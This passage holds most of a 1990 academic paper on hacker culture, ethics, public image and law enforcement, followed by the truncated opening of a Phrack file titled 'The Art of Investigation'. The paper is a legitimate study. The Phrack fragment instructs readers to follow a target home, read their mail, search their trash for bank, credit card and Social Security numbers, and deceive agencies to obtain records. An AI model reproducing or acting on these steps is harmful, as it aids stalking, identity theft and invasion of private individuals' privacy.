a note to the RISKS Forum (Huebner89): ``I was just interested in
computers, not in the data which has been kept on their disks. As
I was going to school at that time, I didn't even have the money
to buy my own computer. Since CP/M (which was the most sophisticated
OS I could use on machines which I had legal access to) didn't turn
me on anymore, I enjoyed the lax security of the systems I had access
to by using X.25 networks. You might point out that I should have
been patient and waited until I could go to the university and
use their machines. Some of you might understand that waiting was
just not the thing I was keen on in those days.''
Brian Harvey, in his position paper (Harvey86) for the ACM Panel on
Hacking, claims that the computer medium available to students, e.g.,
BASIC and floppy disks, is inadequate for challenging intellectual
work. His recommendation is that students be given access to real
computing power, and that they be taught how to use that power
responsibly. He describes a program he created at a public high school
in Massachusetts during the period 1979-1982. They installed a
PDP-11/70 and let students and teachers carry out the administration
of the system. Harvey assessed that putting the burden of dealing
with the problems of malicious users on the students themselves was
a powerful educational force. He also noted that the students who
had the skill and interest to be password hackers were discouraged
from this activity because they also wanted to keep the trust of
their colleagues in order that they could acquire ``superuser'' status
on the system.
Harvey also makes an interesting analogy between teaching computing
and teaching karate. In karate instruction, students are introduced
to the real, adult community. They are given access to a powerful,
deadly weapon, and at the same time are taught discipline and
responsibility. Harvey speculates that the reason that students
do not misuse their power is that they know they are being trusted
with something important, and they want to live up to that trust.
Harvey applied this principle when he set up the school system.
The ACM panel endorsed Harvey's recommendation, proposing a
three-tiered computing environment with local, district-wide, and
nation-wide networks. They recommended that computer professionals
participate in this effort as mentors and role models. They also
recommended that government and industry be encouraged to establish
regional computing centers using donated or re-cycled equipment;
that students be apprenticed to local companies either part-time
on a continuing basis or on a periodic basis; and, following a
suggestion from Felsenstein (Felsenstein86) for a ``Hacker's League,''
that a league analogous to the Amateur Radio Relay League be
established to make contributed resources available for educational
purposes.
Drake said he liked these recommendations. He said that if hackers
were given access to powerful systems through a public account system,
they would supervise themselves. He also suggested that Computer
Resource Centers be established in low-income areas in order to help
the poor get access to information. Perhaps hackers could help run
the centers and teach the members of the community how to use the
facilities. One of my colleagues suggested cynically that the hackers
would only use this to teach the poor how to hack rich people's
systems. A hacker responded by saying this was ridiculous; hackers
would not teach people how to break into systems, but rather how
to use computers effectively and not be afraid of them.
In addition, the hackers I spoke with who had given up illegal
activities said they stopped doing so when they got engaged in other
work.
Geoff Goodfellow and Richard Stallman have reported that they have
given hackers accounts on systems that they manage, and that the
hackers have not misused the trust granted to them. Perhaps
universities could consider providing accounts to pre-college students
on the basis of recommendations from their teachers or parents.
The students might be challenged to work on the same homework problems
assigned in courses or to explore their own interests. Students
who strongly dislike the inflexibility of classroom learning might
excel in an environment that allows them to learn on their own, in
much the way that hackers have done.
4. Thrill, Excitement, and Challenge
One hacker wrote that ``Hackers understand something basic about
computers, and that is that they can be enjoyed. I know none who
hack for money, or hack to frighten the company, or hack for anything
but fun.''
In the words of another hacker, ``Hacking was the ultimate cerebral
buzz for me. I would come home from another dull day at school,
turn my computer on, and become a member of the hacker elite. It
was a whole different world where there were no condescending adults
and you were judged only by your talent. I would first check in
to the private Bulletin Boards where other people who were like me
would hang out, see what the news was in the community, and trade
some info with people across the country. Then I would start actually
hacking. My brain would be going a million miles an hour and I'd
basically completely forget about my body as I would jump from one
computer to another trying to find a path into my target. It was
the rush of working on a puzzle coupled with the high of discovery
many magnitudes intensified. To go along with the adrenaline rush
was the illicit thrill of doing something illegal. Every step I made
could be the one that would bring the authorities crashing down on
me. I was on the edge of technology and exploring past it, spelunking
into electronic caves where I wasn't supposed to be.''
The other hackers I spoke with made similar statements about the
fun and challenge of hacking. In SPIN magazine (Dibbel90), reporter
Julian Dibbell speculated that much of the thrill comes from the
dangers associated with the activity, writing that ``the technology
just lends itself to cloak-and-dagger drama,'' and that ``hackers
were already living in a world in which covert action was nothing
more than a game children played.''
Eric Corley (Corley89) characterizes hacking as an evolved form of
mountain climbing. In describing an effort to construct a list of
active mailboxes on a Voice Messaging System, he writes ``I suppose
the main reason I'm wasting my time pushing all these buttons is
simply so that I can make a list of something that I'm not supposed
to have and be the first person to accomplish this.'' He said that
he was not interested in obtaining an account of his own on the system.
Gordon Meyer says he found this to be a recurring theme: ``We aren't
supposed to be able to do this, but we can'' -- so they do.
One hacker said he was now working on anti-viral programming. He
said it was almost as much fun as breaking into systems, and that
it was an intellectual battle against the virus author.
5. Ethics and Avoiding Damage
All of the hackers I spoke with said that malicious hacking was morally
wrong. They said that most hackers are not intentionally malicious,
and that they themselves are concerned about causing accidental
damage. When I asked Drake about the responsibility of a person
with a PC and modem, his reply included not erasing or modifying
anyone else's data, and not causing a legitimate user on a system
any problems. Hackers say they are outraged when other hackers cause
damage or use resources that would be missed, even if the results
are unintentional and due to incompetence. One hacker wrote ``I
have ALWAYS strived to do NO damage, and to inconvenience as few people
as possible. I NEVER, EVER, EVER DELETE A FILE. One of the first
commands I do on a new system is disable the delete file command.''
Some hackers say that it is unethical to give passwords and similar
security-related information to persons who might do damage. In
the recent incident where a hacker broke into Bell South and downloaded
a text file on the emergency 911 service, hackers say that there
was no intention to use this knowledge to break into or sabotage
the 911 system. According to Emmanuel Goldstein (Goldstein90), the
file did not even contain information about how to break into the
911 system.
The hackers also said that some break-ins were unethical, e.g.,
breaking into hospital systems, and that it is wrong to read
confidential information about individuals or steal classified
information. All said it was wrong to commit fraud for personal
profit.
Although we as computer security professionals often disagree with
hackers about what constitutes damage, the ethical standards listed
here sound much like our own. Where the hackers' ethics differ from
the standards adopted by most in the computer security community
is that hackers say it is not unethical to break into many systems,
use idle computer and communications resources, and download system
files in order to learn. Goldstein says that hacking is not wrong:
it is not the same as stealing, and uncovers design flaws and security
deficiencies (Goldstein89).
Brian Reid, a colleague at Digital who has spoken with many hackers,
speculates that a hacker's ethics may come from not being raised
properly as a civilized member of society, and not appreciating the
rules of living in society. One hacker responded to this with ``What
does `being brought up properly' mean? Some would say that it is
`good' to keep to yourself, mind your own business. Others might
argue that it is healthy to explore, take risks, be curious and
discover.'' Brian Harvey (Harvey86) notes that many hackers are
adolescents, and that adolescents are at a less advanced stage of
moral development than adults, where they might not see how the effects
of their actions hurt others. Larry Martin (Martin89) claims that
parents, teachers, the press, and others in society are not aware
of their responsibility to contribute to instilling ethical values
associated with computer use. This could be the consequence of the
youth of the computing field; many people are still computer illiterate
and cultural norms may be lagging behind advances in technology and
the growing dependency on that technology by businesses and society.
Hollinger and Lanza-Kaduce (HollingerLanza-Kaduce88) speculate that
the cultural normative messages about the use and abuse of computer
technology have been driven by the adoption of criminal laws in the
last decade. They also speculate that hacking may be encouraged
during the process of becoming computer literate. Some of my
colleagues say that hackers are irresponsible. One hacker responded
``I think it's a strong indication of the amount of responsibility
shown that so FEW actually DAMAGING incidents are known.''
But we must not overlook that the differences in ethics also reflect
a difference in philosophy about information and information handling
resources; whereas hackers advocate sharing, we seem to be advocating
ownership as property. The differences also represent an opportunity
to examine our own ethical behavior and our practices for information
sharing and protection. For example, one hacker wrote ``I will accept
that it is morally wrong to copy some proprietary software, however,
I think that it is morally wrong to charge $6000 for a program that
is only around 25K long.'' Hence, I shall go into a few of the ethical
points raised by hackers more closely. It is not a simple case of
good or mature (us) against bad or immature (hackers), or of teaching
hackers a list of rules.
Many computer professionals such as Martin (Martin89) argue the moral
questions by analogy. The analogies are then used to justify their
judgment of a hacker's actions as unethical. Breaking into a system
is compared with breaking into a house, and downloading information
and using computer and telecommunications services is compared with
stealing tangible goods. But, say hackers, the situations are not
the same. When someone breaks into a house, the objective is to
steal goods, which are often irreplaceable, and property is often
damaged in the process. By contrast, when a hacker breaks into a
system, the objective is to learn and avoid causing damage. Downloaded
information is copied, not stolen, and still exists on the original
system. Moreover, as noted earlier, information has not been
traditionally regarded as property. Dibbell (Dibbel90) says that
when the software industries and phone companies claim losses of
billions of dollars to piracy, they are not talking about goods that
disappear from the shelves and could have been sold.
We often say that breaking into a system implies a lack of caring
for the system's owner and authorized users. But, one hacker says
that the ease of breaking into a system reveals a lack of caring
on the part of the system manager to protect user and company assets,
or failure on the part of vendors to warn managers about the
vulnerabilities of their systems. He estimated his success rate
of getting in at 10-15%, and that is without spending more than an
hour on any one target system. Another hacker says that he sees
messages from vendors notifying the managers, but that the managers
fail to take action.
Richard Pethia of CERT (Computer Emergency Response Team) reports
that they seldom see cases of malicious damage caused by hackers,
but that the break-ins are nevertheless disruptive because system
users and administrators want to be sure that nothing was damaged.
(CERT suggests that sites reload system software from secure backups
and change all user passwords in order to protect against possible
back doors and Trojan Horses that might have been planted by the
hacker. Pethia also noted that prosecutors are generally called
for government sites, and are being called for non-government sites
with increasing frequency.) Pethia says that break-ins also generate
a loss of trust in the computing environment, and may lead to adoption
of new policies that are formulated in a panic or management edicts
that severely restrict connectivity to outside systems. Brian Harvey
says that hackers cause damage by increasing the amount of paranoia,
which in turn leads to tighter security controls that diminish the
quality of life for the users. Hackers respond to these points by
saying they are the scapegoats for systems that are not adequately
protected. They say that the paranoia is generated by ill-founded
fears and media distortions (I will return to this point later),
and that security need not be oppressive to keep hackers out; it
is mainly making sure that passwords and system defaults are
well chosen.
Pethia says that some intruders seem to be disruptive to prove a
point, such as that the systems are vulnerable, the security personnel
are incompetent, or ``it's not nice to say bad things about hackers.''
In the N.Y. Times, John Markoff (Markoff90) wrote that the hacker
who claimed to have broken into Cliff Stoll's system said he was
upset by Stoll's portrayal of hackers in ``The Cuckoo's Egg''
(Stoll90). Markoff reported that the caller said: ``He (Stoll)
was going on about how he hates all hackers, and he gave pretty much
of a one-sided view of who hackers are.''
``The Cuckoo's Egg'' captures many of the popular stereotypes of
hackers. Criminologist Jim Thomas criticizes it for presenting a
simplified view of the world, one where everything springs from the
forces of light (us) or of darkness (hackers) (Thomas90). He claims
that Stoll fails to see the similarities between his own activities
(e.g., monitoring communications, ``borrowing'' monitors without
authorization, shutting off network access without warning, and lying
to get information he wants) and those of hackers. He points out
Stoll's use of pejorative words such as ``varmint'' to describe
hackers, and Stoll's quote of a colleague: ``They're technically
skilled but ethically bankrupt programmers without any respect for
others' work -- or privacy. They're not destroying one or two
programs. They're trying to wreck the cooperation that builds our
networks,'' (Stoll90, p. 159). Thomas writes ``at an intellectual
level, it (Stoll's book) provides a persuasive, but simplistic, moral
imagery of the nature of right and wrong, and provides what -- to
a lay reader -- would seem a compelling justification for more statutes
and severe penalties against the computer underground. This is
troublesome for two reasons. First, it leads to a mentality of social
control by law enforcement during a social phase when some would
argue we are already over-controlled. Second, it invokes a punishment
model that assumes we can stamp out behaviors to which we object
if only we apprehend and convict a sufficient number of violators.
... There is little evidence that punishment will in the long run
reduce any given offense, and the research of Gordon Meyer and I
suggests that criminalization may, in fact, contribute to the growth
of the computer underground.''
6. Public Image and Treatment
Hackers express concern about their negative public image and
identity. As noted earlier, hackers are often portrayed as being
irresponsible and immoral. One hacker said that ``government
propaganda is spreading an image of our being at best, sub-human,
depraved, criminally inclined, morally corrupt, low life. We need
to prove that the activities that we are accused of (crashing systems,
interfering with life support equipment, robbing banks, and jamming
911 lines) are as morally abhorrent to us as they are to the general
public.''
The public identity of an individual or group is generated in part
by the actions of the group interacting with the standards of the
community observing those actions. What then accounts for the
difference between the hacker's public image and what they say about
themselves? One explanation may be the different standards. Outside
the hacking community, the simple act of breaking into systems is
regarded as unethical by many. The use of pejorative words like
``vandal'' and ``varmint'' reflects this discrepancy in ethics. Even
the word ``criminal'' carries with it connotations of someone evil;
hackers say they are not criminal in this sense. Katie Hafner notes
that Robert Morris Jr., who was convicted of launching the Internet
worm, was likened to a terrorist even though the worm did not destroy
data (Hafner90).
Distortions of events and references to potential threats also create
an image of persons who are dangerous. Regarding the 911 incident
where a hacker downloaded a file from Bell South, Goldstein reported
``Quickly, headlines screamed that hackers had broken into the 911
system and were interfering with emergency telephone calls to the
police. One newspaper report said there were no indications that
anyone had died or been injured as a result of the intrusions. What
a relief. Too bad it wasn't true,'' (Goldstein90). In fact, the
hackers involved with the 911 text file had not broken into the 911
system. The dollar losses attributed to hacking incidents also are
often highly inflated.
Thomas and Meyer (ThomasMeyer90) say that the rhetoric depicting
hackers as a dangerous evil contributes to a ``witch hunt'' mentality,
wherein a group is first labeled as dangerous, and then enforcement
agents are mobilized to exorcise the alleged social evil. They see
the current sweeps against hackers as part of a reaction to a broader
fear of change, rather than to the actual crimes committed.
Hackers say they are particularly concerned that computer security
professionals and system managers do not appear to understand hackers
or be interested in their concerns. Hackers say that system managers
treat them like enemies and criminals, rather than as potential helpers
in their task of making their systems secure. This may reflect
managers' fears about hackers, as well as their responsibilities
to protect the information on their systems. Stallman says that
the strangers he encounters using his account are more likely to
have a chip on their shoulder than in the past; he attributes this
to a harsh enforcer mentality adopted by the establishment. He says
that network system managers start out with too little trust and
a hostile attitude toward strangers that few of the strangers deserve.
One hacker said that system managers show a lack of openness to those
who want to learn.
Stallman also says that the laws make the hacker scared to communicate
with anyone even slightly ``official,'' because that person might
try to track the hacker down and have him or her arrested. Drake
raised the issue of whether the laws could differentiate between
malicious and nonmalicious hacking, in support of a ``kinder, gentler''
relationship between hackers and computer security people. In fact,
many states such as California initially passed computer crime laws
that excluded malicious hacking; it was only later that these laws
were amended to include nonmalicious actions (HollingerLanza-Kaduce88).
Hollinger and Lanza-Kaduce speculate that these amendments and other
new laws were catalyzed mainly by media events, especially the reports
on the ``414 hackers'' and the movie ``War Games,'' which created
a perception of hacking as extremely dangerous, even if that perception
was not based on facts.
Hackers say they want to help system managers make their systems
more secure. They would like managers to recognize and use their
knowledge about system vulnerabilities. Landreth (Landreth89)
suggests ways in which system managers can approach hackers in order
to turn them into colleagues, and Goodfellow also suggests befriending
hackers (Goodfellow83). John Draper (Cap'n Crunch) says it would
help if system managers and the operators of phone companies and
switches could cooperate in tracing a hacker without bringing in
law enforcement authorities.
Drake suggests giving hackers free access in exchange for helping
with security, a suggestion that I also heard from several hackers.
Drake says that the current attitude of treating hackers as enemies
is not very conducive to a solution, and by belittling them, we only
cause ourselves problems.
I asked some of the hackers whether they'd be interested in breaking
into systems if the rules of the ``game'' were changed so that instead
of being threatened by prosecution, they were invited to leave a
``calling card'' giving their name, phone number, and method of
breaking in. In exchange, they would get recognition and points
for each vulnerability they discovered. Most were interested in
playing; one hacker said he would prefer monetary reward since he
was supporting himself. Any system manager interested in trying
this out could post a welcome message inviting hackers to leave their
cards. This approach could have the advantage of not only letting
the hackers contribute to the security of the system, but of allowing
the managers to quickly recognize the potentially malicious hackers,
since they are unlikely to leave their cards. Perhaps if hackers
are given the opportunity to make contributions outside the
underground, this will dampen their desire to pursue illegal activities.
Several hackers said that they would like to be able to pursue their
activities legally and for income. They like breaking into systems,
doing research on computer security, and figuring out how to protect
against vulnerabilities. They say they would like to be in a position
where they have permission to hack systems. Goodfellow suggests
hiring hackers to work on tiger teams that are commissioned to locate
vulnerabilities in systems through penetration testing. Baird
Info-Systems Safeguards, Inc., a security consulting firm, reports
that they have employed hackers on several assignments (Baird87).
They say the hackers did not violate their trust or the trust of
their clients, and performed in an outstanding manner. Baird believes
that system vulnerabilities can be better identified by employing
people who have exploited systems.
One hacker suggested setting up a clearinghouse that would match
hackers with companies that could use their expertise, while
maintaining anonymity of the hackers and ensuring confidentiality
of all records. Another hacker, in describing an incident where
he discovered a privileged account without a password, said ``What
I (and others) wish for is a way that hackers can give information
like this to a responsible source, AND HAVE HACKERS GIVEN CREDIT
FOR HELPING! As it is, if someone told them that `I'm a hacker, and
I REALLY think you should know...' they would freak out, and run
screaming to the SS (Secret Service) or the FBI. Eventually, the
person who found it would be caught, and hauled away on some crazy
charge. If they could only just ACCEPT that the hacker was trying
to help!'' The clearinghouse could also provide this type of service.
Hackers are also interested in security policy issues. Drake expressed
concern over how we handle information about computer security
vulnerabilities. He argues that it is better to make this information
public than cover it up and pretend that it does not exist, and cites
the CERT to illustrate how this approach can be workable. Other
hackers, however, argue for restricting initial dissemination of
flaws to customers and users. Drake also expressed concern about
the role of the government, particularly the military, in
cryptography. He argues that NSA's opinion on a cryptographic standard
should be taken with a large grain of salt because of their code
breaking role.
Some security specialists are opposed to hiring hackers for security
work, and Eugene Spafford has urged people not to do business with
any company that hires a convicted hacker to work in the security
area (ACM90). He says that ``This is like having a known arsonist
install a fire alarm.'' But, the laws are such that a person can
be convicted for having done nothing other than break into a system;
no serious damage (i.e., no ``computer arson'') is necessary. Many
of our colleagues, including Geoff Goodfellow (Goodfellow83) and
Brian Reid (Frenkel87), admit to having broken into systems in the
past. Reid is quoted as saying that because of the knowledge he gained
breaking into systems as a kid, he was frequently called in to help
catch people who break in. Spafford says that times have changed,
and that this method of entering the field is no longer socially
acceptable, and fails to provide adequate training in computer science
and computer engineering (Spafford89). However, from what I have
observed, many hackers do have considerable knowledge about
telecommunications, data security, operating systems, programming
languages, networks, and cryptography. But, I am not challenging
a policy to hire competent people of sound character. Rather, I
am challenging a strict policy that uses economic pressure to close
a field of activity to all persons convicted of breaking into
systems. It is enough that a company is responsible for the behavior
of its employees. Each hacker can be considered for employment based
on his or her own competency and character.
Some people have called for stricter penalties for hackers, including
prison terms, in order to send a strong deterrent message to hackers.
John Draper, who was incarcerated for his activities in the 1970's,
argues that in practice this will only make the problem worse. He
told me that he was forced under threat to teach other inmates his
knowledge of communications systems. He believes that prison sentences
will serve only to spread hackers' knowledge to career criminals.
He said he was never approached by criminals outside the prison,
but that inside the prison they had control over him.
One hacker said that by clamping down on the hobbyist underground,
we will only be left with the criminal underground. He said that
without hackers to uncover system vulnerabilities, the holes will
be left undiscovered, to be utilized by those likely to cause real
damage.
Goldstein argues that the existing penalties are already way out
of proportion to the acts committed, and that the reason is because
of computers (Goldstein89). He says that if Kevin Mitnick had
committed crimes similar to those he committed but without a computer,
he would have been classified as a mischief maker and maybe fined
$100 for trespassing; instead, he was put in jail without bail
(Goldstein89). Craig Neidorf, a publisher and editor of the electronic
newsletter ``Phrack,'' faces up to 31 years and a fine of $122,000
for receiving, editing, and transmitting the downloaded text file
on the 911 system (Goldstein90). (Since the time I wrote this, a new
indictment was issued with penalties of up to 65 years in prison.
Neidorf went on trial beginning July 23. The trial ended July 27
when the government dropped all charges. DED)
7. Privacy and the First and Fourth Amendments
The hackers I spoke with advocated privacy protection for sensitive
information about individuals. They said they are not interested
in invading people's privacy, and that they limited their hacking
activities to acquiring information about computer systems or how
to break into them. There are, of course, hackers who break into
systems such as the TRW credit database. Emmanuel Goldstein argues
that such invasions of privacy took place before the hacker arrived
(Harpers90). Referring to credit reports, government files, motor
vehicle records, and the ``megabytes of data piling up about each
of us,'' he says that thousands of people legally can see and use
this data, much of it erroneous. He claims that the public has been
misinformed about the databases, and that hackers have become
scapegoats for the holes in the systems. One hacker questioned the
practice of storing sensitive personal information on open systems
with dial-up access, the accrual of the information, the methods
used to acquire it, and the purposes to which it is put. Another
hacker questioned the inclusion of religion and race in credit records.
Drake told me that he was concerned about the increasing amount of
information about individuals that is stored in large data banks,
and the inability of the individual to have much control over the
use of that information. He suggests that the individual might be
co-owner of information collected about him or her, with control
over the use of that information. He also says that an individual
should be free to withhold personal information, of course paying
the consequences of doing so (e.g., not getting a drivers license
or credit card). In fact, all Federal Government forms are required
to contain a Privacy Act Statement that states how the information
being collected will be used and, in some cases, giving the option
of withholding the information.
Goldstein has also challenged the practices of law enforcement agencies
in their attempt to crack down on hackers (Goldstein90). He said
that all incoming and outgoing electronic mail used by ``Phrack''
was monitored before the newsletter was shut down by authorities.
``Had a printed magazine been shut down in this fashion after having
all of their mail opened and read, even the most thick-headed
sensationalist media types would have caught on: hey, isn't that
a violation of the First Amendment?'' He also cites the shutdown
of several bulletin boards as part of Operation Sun Devil, and quotes
the administrator of the bulletin board Zygot as saying ``Should
I start reading my users' mail to make sure they aren't saying anything
naughty? Should I snoop through all the files to make sure everyone
is being good? This whole affair is rather chilling.'' The
administrator for the public system The Point wrote ``Today, there
is no law or precedent which affords me ... the same legal rights
that other common carriers have against prosecution should some other
party (you) use my property (The Point) for illegal activities.
That worries me ...''
About 40 personal computer systems and 23,000 data disks were seized
under Operation Sun Devil, a two-year investigation involving the
FBI, Secret Service, and other federal and local law enforcement
officials. In addition, the Secret Service acknowledges that its
agents, acting as legitimate users, had secretly monitored computer
bulletin boards (Markoff90a). Markoff reports that California
Representative Don Edwards, industry leader Mitchell Kapor, and civil
liberties advocates are alarmed by these government actions, saying
that they challenge freedom of speech under the First Amendment and
protection against searches and seizures under the Fourth Amendment.
Markoff asks: ``Will fear of hackers bring oppression?''
John Barlow writes ``The Secret Service may actually have done a
service for those of us who love liberty. They have provided us
with a devil. And devils, among their other galvanizing virtues,
are just great for clarifying the issues and putting iron in your
spine,'' (Barlow90). Some of the questions that Barlow says need
to be addressed include ``What are data and what is free speech?
How does one treat property which has no physical form and can be
infinitely reproduced? Is a computer the same as a printing press?''
Barlow urges those of us who understand the technology to address
these questions, lest the answers be given to us by law makers and
law enforcers who do not. Barlow and Kapor are constituting a
foundation to ``raise and disburse funds for education, lobbying,
and litigation in the areas relating to digital speech and the
extension of the Constitution into Cyberspace.''
8. Conclusions
Hackers say that it is our social responsibility to share information,
and that it is information hoarding and disinformation that are the
crimes. This ethic of resource and information sharing contrasts
sharply with computer security policies that are based on authorization
and ``need to know.'' This discrepancy raises an interesting question:
Does the hacker ethic reflect a growing force in society that stands
for greater sharing of resources and information -- a reaffirmation
of basic values in our constitution and laws? It is important that
we examine the differences between the standards of hackers, systems
managers, users, and the public. These differences may represent
breakdowns in current practices, and may present new opportunities
to design better policies and mechanisms for making computer resources
and information more widely available.
The sentiment for greater information sharing is not restricted to
hackers. In the best seller, ``Thriving on Chaos,'' Tom Peters
(Peters87) writes about sharing within organizations: ``Information
hoarding, especially by politically motivated, power-seeking staffs,
has been commonplace throughout American industry, service and
manufacturing alike. It will be an impossible millstone around the
neck of tomorrow's organizations. Sharing is a must.'' Peters argues
that information flow and sharing is fundamental to innovation and
competitiveness. On a broader scale, Peter Drucker (Drucker89) says
that the ``control of information by government is no longer possible.
Indeed, information is now transnational. Like money, it has no
`fatherland.' ''
Nor is the sentiment restricted to people outside the computer security
field. Harry DeMaio (DeMaio89) says that our natural urge is to
share information, and that we are suspicious of organizations and
individuals who are secretive. He says that information is exchanged
out of ``want to know'' and mutual accommodation rather than ``need
to know.'' If this is so, then some of our security policies are
out of step with the way people work. Peter Denning (DenningP89)
says that information sharing will be widespread in the emerging
worldwide networks of computers and that we need to focus on ``immune
systems'' that protect against mistakes in our designs and recover
from damage.
I began my investigation of hackers with the question, who are they
and what is their culture and discourse? My investigation uncovered
some of their concerns, which provided the organizational structure
to this paper, and several suggestions for new actions that might
be taken. My investigation also opened up a broader question: What
conflict in society do hackers stand at the battle lines of? Is
it owning or restricting information vs. sharing information -- a
tension between an age-old tradition of controlling information as
property and the Enlightenment tradition of sharing and disseminating
information? Is it controlling access based on ``need to know,''
as determined by the information provider, vs. ``want to know,''
as determined by the person desiring access? Is it law enforcement
vs. freedoms granted under the First and Fourth Amendments? The
answers to these questions, as well as those raised by Barlow on
the nature of information and free speech, are important because
they tell us whether our policies and practices serve us as well
as they might. The issue is not simply hackers vs. system managers
or law enforcers; it is a much larger question about values and
practices in an information society.
Acknowledgments
I am deeply grateful to Peter Denning, Frank Drake, Nathan Estey,
Katie Hafner, Brian Harvey, Steve Lipner, Teresa Lunt, Larry Martin,
Gordon Meyer, Donn Parker, Morgan Schweers, Richard Stallman, and
Alex for their comments on earlier versions of this paper and helpful
discussions; to Richard Stallman for putting me in contact with
hackers; John Draper, Geoff Goodfellow, Brian Reid, Eugene Spafford,
Dave, Marcel, Mike, RGB, and the hackers for helpful discussions;
and Richard Pethia for a summary of some of his experiences at CERT.
The opinions expressed here, however, are my own and do not necessarily
represent those of the people mentioned above or of Digital Equipment
Corporation.
References
ACM90
``Just say no,'' Comm. ACM, Vol. 33, No. 5, May 1990, p. 477.
Baird87
Bruce J. Baird, Lindsay L. Baird, Jr., and Ronald P. Ranauro, ``The
Moral Cracker?,'' Computers and Security, Vol. 6, No. 6, Dec. 1987,
p. 471-478.
Barlow90
John Barlow, ``Crime and Puzzlement,'' June 1990, to appear in Whole
Earth Review.
Corley89
Eric Corley, ``The Hacking Fever,'' in Pamela Kane, V.I.R.U.S.
Protection, Bantam Books, New York, 1989, p. 67-72.
DeMaio89
Harry B. DeMaio, ``Information Ethics, a Practical Approach,''
Proc. of the 12th National Computer Security Conference, 1989,
p. 630-633.
DenningP89
Peter J. Denning, ``Worldnet,'' American Scientist, Vol. 77, No. 5,
Sept.-Oct., 1989.
DenningP90
Peter J. Denning, Computers Under Attack, ACM Press, 1990.
Dibbel90
Julian Dibbel, ``Cyber Thrash,'' SPIN, Vol. 5, No. 12, March 1990.
Drucker89
Peter F. Drucker, The New Realities, Harper and Row, New York, 1989.
Felsenstein86
Lee Felsenstein, ``Real Hackers Don't Rob Banks,'' in full report on
ACM Panel on Hacking (Lee86).
Frenkel87
Karen A. Frenkel, ``Brian Reid, A Graphics Tale of a Hacker
Tracker,'' Comm. ACM, Vol. 30, No. 10, Oct. 1987, p. 820-823.
Goldstein89
Emmanuel Goldstein, ``Hackers in Jail,'' 2600 Magazine, Vol. 6, No. 1,
Spring 1989.
Goldstein90
Emmanuel Goldstein, ``For Your Protection,'' 2600 Magazine, Vol. 7,
No. 1, Spring 1990.
Goodfellow83
Geoffrey S. Goodfellow, ``Testimony Before the Subcommittee on
Transportation, Aviation, and Materials on the Subject of
Telecommunications Security and Privacy,'' Sept. 26, 1983.
Hafner90
Katie Hafner, ``Morris Code,'' The New Republic, Feb. 16, 1990,
p. 15-16.
Harpers90
``Is Computer Hacking a Crime?'' Harper's, March 1990, p. 45-57.
Harvey86
Brian Harvey, ``Computer Hacking and Ethics,'' in full report on
ACM Panel on Hacking (Lee86).
HollingerLanza-Kaduce88
Richard C. Hollinger and Lonn Lanza-Kaduce, ``The Process of
Criminalization: The Case of Computer Crime Laws,'' Criminology,
Vol. 26, No. 1, 1988, p. 101-126.
Huebner89
Hans Huebner, ``Re: News from the KGB/Wiley Hackers,'' RISKS Digest,
Vol. 8, Issue 37, 1989.
Landreth89
Bill Landreth, Out of the Inner Circle, Tempus, Redmond, WA, 1989.
Lee86
John A. N. Lee, Gerald Segal, and Rosalie Stier, ``Positive
Alternatives: A Report on an ACM Panel on Hacking,'' Comm. ACM,
Vol. 29, No. 4, April 1986, p. 297-299; full report available from
ACM Headquarters, New York.
Levy84
Steven Levy, Hackers, Dell, New York, 1984.
Markoff90
John Markoff, ``Self-Proclaimed `Hacker' Sends Message to Critics,''
The New York Times, March 19, 1990.
Markoff90a
John Markoff, ``Drive to Counter Computer Crime Aims at Invaders,''
The New York Times, June 3, 1990.
Martin89
Larry Martin, ``Unethical `Computer' Behavior: Who is Responsible?,''
Proc. of the 12th National Computer Security Conference, 1989.
Meyer89
Gordon R. Meyer, The Social Organization of the Computer Underground,
Master's thesis, Dept. of Sociology, Northern Illinois Univ., Aug.
1989.
MeyerThomas90
Gordon Meyer and Jim Thomas, ``The Baudy World of the Byte Bandit:
A Postmodernist Interpretation of the Computer Underground,'' Dept.
of Sociology, Northern Illinois Univ., DeKalb, IL, March 1990.
Peters87
Tom Peters, Thriving on Chaos, Harper & Row, New York, Chapter VI, S-3,
p. 610, 1987.
Spafford89
Eugene H. Spafford, ``The Internet Worm, Crisis and Aftermath,''
Comm. ACM, Vol. 32, No. 6, June 1989, p. 678-687.
Stallman84
Richard M. Stallman, Letter to ACM Forum, Comm. ACM, Vol. 27,
No. 1, Jan. 1984, p. 8-9.
Stallman90
Richard M. Stallman, ``Against User Interface Copyright'' to appear
in Comm. ACM.
Steele83
Guy L. Steele, Jr., Donald R. Woods, Raphael A. Finkel, Mark R.
Crispin, Richard M. Stallman, and Geoffrey S. Goodfellow, The
Hacker's Dictionary, Harper & Row, New York, 1983.
Stoll90
Clifford Stoll, The Cuckoo's Egg, Doubleday, 1990.
Thomas90
Jim Thomas, ``Review of The Cuckoo's Egg,'' Computer Underground
Digest, Issue #1.06, April 27, 1990.
ThomasMeyer90
Jim Thomas and Gordon Meyer, ``Joe McCarthy in a Leisure Suit:
(Witch)Hunting for the Computer Underground,'' Unpublished
manuscript, Department of Sociology, Northern Illinois University,
DeKalb, IL, 1990; see also the Computer Underground Digest, Vol.
1, Issue 11, June 16, 1990.
_______________________________________________________________________________
==Phrack Classic==
Volume Three, Issue 32, File #4 of 12
*****  T H E   A R T   O F   I N V E S T I G A T I O N  *****
*****                                                   *****
*****                                                   *****
*****                 Brought to You By                 *****
*****                                                   *****
*****                    The Butler                     *****
*****                                                   *****
*****                     10/31/90                      *****
*****                                                   *****
*****                                                   *****
There are many ways to obtain information about individuals. I am going to
cover some of the investigative means of getting the low down on people whom
you wish to know more about.
Some of the areas I will cover are:
Social Security Checks
Driving/Vehicular Records
Police Reports
FBI Records
Insurance Records
Legal Records
Credit Bureau Checks
Probate Records
Real Estate Records
Corporate Records
Freedom Of Information Act
Governmental Agency Records
Maps
Tax Records
To obtain information from some organizations or some individuals one must be
able to "BULLSHIT"!!! Not only by voice but in writing. Many times you must
write certain governmental bodies requesting info and it can only be done in
writing. I can't stress enough the need for proper grammar and spelling.
For you to obtain certain information about another person you must first
get a few KEY pieces of info to make your investigation easier. The person's
Full Name, Social Security Number, Date & Place of Birth will all make your
search easier and more complete.
First of all, in most cases you will know the name of the person you want to
investigate. If not you must obtain it any way you can. First you could follow them
to their home and get their address. Then some other time when they are gone
you could look at their mail or dig through their trash to get their Full Name.
While in their trash you might even be able to dig up more interesting info
like: Bank Account Numbers, Credit Card Numbers, Social Security Number, Birth
Day, Relatives Names, Long Distance Calls Made, etc.
If you can't get to their trash for some reason take their address to your
local library and check it against the POLKS and COLES Directories. This
should provide you with their Full Name, Phone Number, Address, and how long
they have lived at the current location.
You can also check the Local Phone Book, Directory Assistance, City Directories,
